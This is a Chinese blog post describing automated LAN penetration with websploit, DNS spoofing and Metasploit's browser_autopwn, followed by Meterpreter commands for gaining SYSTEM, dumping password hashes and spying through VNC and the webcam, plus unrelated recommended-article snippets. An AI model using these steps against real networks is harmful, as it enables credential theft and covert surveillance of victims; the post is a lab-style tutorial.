使用websploit在局域网全自动渗透

最新推荐文章于 2021-05-12 21:44:33 发布
最新推荐文章于 2021-05-12 21:44:33 发布
阅读量2k 收藏 6
点赞数 3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/h4ck0ne/article/details/50570655
版权

原理为 websploit调用dnsdpoof进行dns欺骗配合神器metasploit的web_autopwn模块进行渗透;特点:过程基本全自动。

 

终端输入websploit打开websploit;输入show modules查看所有模块:

   

查看到有exploit/browser_autopwn模块和exploit/java_applet模块可以使用(新版metasploit去掉了exploit/autopwn模块);这里以exploit/browser_autopwn模块为例:

   

设置好之后输入run开始运行,然后就等着鱼儿上钩了(这两个功能完全可以单独手动配置的,这里websploit将其组合了起来):

   

这是虚拟机里xp测试系统打开网页之后:

 

getsystem                                      #获取sytem权限

hashdump                                     #抓取账户密码hash值  ,然后用ophcrack破解

run vnc                                           #远程连接,监控屏幕

run webcam -p /var/www/          #监控摄像头

background                                   #不退出此meterpreter并返回msf

。。。

   

视频:

清晰版视频下载地址:http://pan.baidu.com/s/1o6AYkK6

http://v.youku.com/v_show/id_XNjUxMjM2OTQ0.html

「已注销」
关注
第十二课-websploit.ppt
02-22
网络攻防相关,欢迎下载。网络攻防相关,欢迎下载。网络攻防相关,欢迎下载。网络攻防相关,欢迎下载。网络攻防相关,欢迎下载。
WebSploit 项目使用教程
最新发布
gitblog_00718的博客
08-12 309
WebSploit 项目使用教程 websploitWebsploit is a high level MITM framework项目地址:https://gitcode.com/gh_mirrors/we/websploit 1. 项目的目录结构及介绍 WebSploit 是一个高级的中间人攻击(MITM)框架,用于扫描和分析远程系统,以发现各种类型的漏洞。以下是 WebSploit 项目的...
linux安装websploit工具,使用Docker构建Web渗透测试工具容器
weixin_42410443的博客
05-12 220
Docker是世界领先的软件集装化平台,针对不同的渗透测试类型,我们完全可以使用Docker创建相应的环境。有了Docker容器,你可以把测试环境放到U盘或者云端。Docker是什么Docker是一个开源的技术,在软件容器中,你可以创建、运行、测试和部署应用程序。Dcoker可以让你在任何环境中快速、可靠、稳定地部署应用程序。容器具有可移植、方便、快速的优点。使用Docker,我们可以创建一个映...
websploit获取管理员后台地址
Anton8801的博客
05-30 1378
1, use web/pma 2, set TARGET http://www.****.com 3, run
Kali Linux Web 渗透测试— 第十二课-websploit
weixin_34392906的博客
01-11 231
Kali Linux Web渗透测试—第十二课-websploit 文/玄魂 目录 Kali Linux Web渗透测试—第十二课-websploit...............................................1 Websploit简介..................................
关于使用SyncToy做双硬盘自动备份,并在局域网共享
10-10
近期做了一个使用SyncToy做双硬盘自动备份与定时重启,并在局域网共享该目录,为了防止自己再次踩坑上传保存
用于删除注册表autoconfigurl,即局域网设置里的自动配置脚本
11-02
工具使用前提是先清理掉病毒和驱动木马。
打造RIS服务器_软件在局域网中自动安装.doc
09-28
打造RIS服务器_软件在局域网中自动安装.doc
自同步:局域网移动端和PC端自动备份
07-12
自同步v2.1.0最新免费版 (官网已不再提供下载地址,私人收藏版) 移动端:zisync-android-2.1.1.apk PC 端:zisync-windows-2.1.0-setup.zip ...2、手机照片、文档自动备份到电脑 3、局域网文件实时、安全、快速传输
局域网文件夹自动同步更新
11-08
在IT领域,局域网(LAN)文件夹的自动同步是一项重要的协作和备份技术,尤其在团队合作或者多设备间保持数据一致性的场景下。本文将深入探讨如何实现局域网内的文件夹自动同步更新,并提供相关的解决方案。 首先,...
websploit
cnbird's blog
03-31 1657
http://code.google.com/p/websploit/
Kali Linux Web***测试之 WebSploit
weixin_34081595的博客
12-09 436
WebSploit简介:l   一个综合性的,高级的中间人漏洞***框架。l   由python编写的开源项目。l   源代码:https://github.com/websploit/websploitl   项目地址:http://sourceforge.net/projects/websploit/主要用于远程扫描和分析系统漏洞,它可以非常快速容易和快速的发现系统中的漏洞,并用于深入分析。W...
安全参透之旅第3章 Websploit工具
安全参透之旅
11-07 1327
Websploit是一个用来扫描和分析远程系统以找出漏洞的工具 1、运行Websploit 2、扫描模块 3、输入 use network/webkiller然后用set TARGER命令来设定攻击目标.
(一)内网渗透之信息收集
爱上卿的博客
08-27 1660
内网渗透之信息收集篇-----参考先知白河愁作品,进行添加修改,转载请注明出处。 一 主机扫描 (1)使用端口扫描工具可以实现主机发现的功能。以下参数可加快扫描进程。特意提的事nmap如何加快扫描进度。 –min-hostgroup 1024(调整并行扫描组的大小,最小分组设置为1024) –min-parallelism 1024(调整探测报文的并行度,最小并行度设置为1024)   ...
Kali Linux Web渗透测试之 WebSploit
weixin_34111790的博客
11-08 1064
WebSploit简介: l一个综合性的,高级的中间人漏洞攻击框架。 l由python编写的开源项目。 l源代码:https://github.com/websploit/websploit l项目地址:http://sourceforge.net/projects/websploit/ 主要用于远程扫描和分析系统漏洞,它可以非...
MetaSploit使用初步教程
weixin_33894640的博客
08-17 157
      Metasploit是一个漏洞开发和利用的平台,功能非常强大,在内网***和漏洞replay方面非常有用,其网站地址为http://www.metasploit.com/,最新版本为3.2,软件下载地址为http://spool.metasploit.com/releases/framework-3.2.exe,有关平台相关的paper可以到http://www.metasploit....
websploit全自动******
weixin_34167043的博客
02-02 215
运行websploitshow modules查看所有模块调置***参数这里出错是没有加载模块,网上有这个模块下载,然后利用命令load加载就行。 转载于:https://blog.51cto.com/biock/1610628...
使用VMware在单机上虚拟局域网
"本文介绍了如何使用虚拟机软件VMware在单台计算机上创建一个局域网环境,以供学习和实验网络技术。作者崔北亮在《CCNA学习与实验指南》中提供了详细步骤,适合网络管理员和学习者进行实践操作。" 在学习网络技术时...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值